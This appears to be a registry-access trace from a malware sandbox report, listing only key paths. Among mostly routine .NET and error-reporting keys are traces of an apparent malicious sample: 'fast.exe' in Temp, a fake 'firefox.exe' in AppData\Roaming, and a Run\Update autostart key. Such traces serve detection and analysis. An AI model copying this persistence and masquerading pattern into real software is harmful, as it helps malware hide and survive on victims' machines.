HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|fast.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|fast.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|fast.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7b067dd3\10e831da
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7b067dd3\78b8789f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6a781c07\10f44e07
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|mozilla firefox|firefox.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|mozilla firefox|firefox.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|mozilla firefox|firefox.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting
HKEY_CURRENT_USER\SOFTWARE\Microsoft\PCHealth\ErrorReporting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\ForceQueueMode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\ShowUI
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\DoReport
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\AllOrNone
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting\ExclusionList
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting\ExclusionList
HKEY_CURRENT_USER\SOFTWARE\Microsoft\PCHealth\ErrorReporting\ExclusionList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting\ExclusionList
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting\InclusionList
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting\InclusionList
HKEY_CURRENT_USER\SOFTWARE\Microsoft\PCHealth\ErrorReporting\InclusionList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting\InclusionList
HKEY_CLASSES_ROOT\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32\(Default)
HKEY_CLASSES_ROOT\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Update
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\Debug
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MachineID
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Windows Error Reporting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DontSendAdditionalData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Disabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\DefaultOverrideBehavior
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\CLR20r3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LoggingDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DontShowUI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DisableArchive
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ConfigureArchive
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DisableQueue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MaxQueueCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MaxArchiveCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ForceQueue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ExcludedApplications
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DebugApplications
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\SendEFSFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\BypassDataThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ForceUserModeCabCollection
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Windows Error Reporting
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DontSendAdditionalData
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Disabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultOverrideBehavior
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\CLR20r3
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\LoggingDisabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DontShowUI
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DisableArchive
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ConfigureArchive
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DisableQueue
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\MaxQueueCount
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\MaxArchiveCount
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ForceQueue
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ExcludedApplications
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DebugApplications
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\SendEFSFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\BypassDataThrottling
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ForceUserModeCabCollection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerUseSSL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerPortNumber
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerUseAuthentication
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Reliability Analysis\RAC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Reliability Analysis\RAC\RacWerSampleTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\RestartRunTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\RestartRunTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Throttling\CLR20r3
HKEY_LOCAL_MACHINE\Software\Microsoft\DirectUI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\SystemLink
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Segoe UI
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInset
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragMinDist
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\dw20.exe
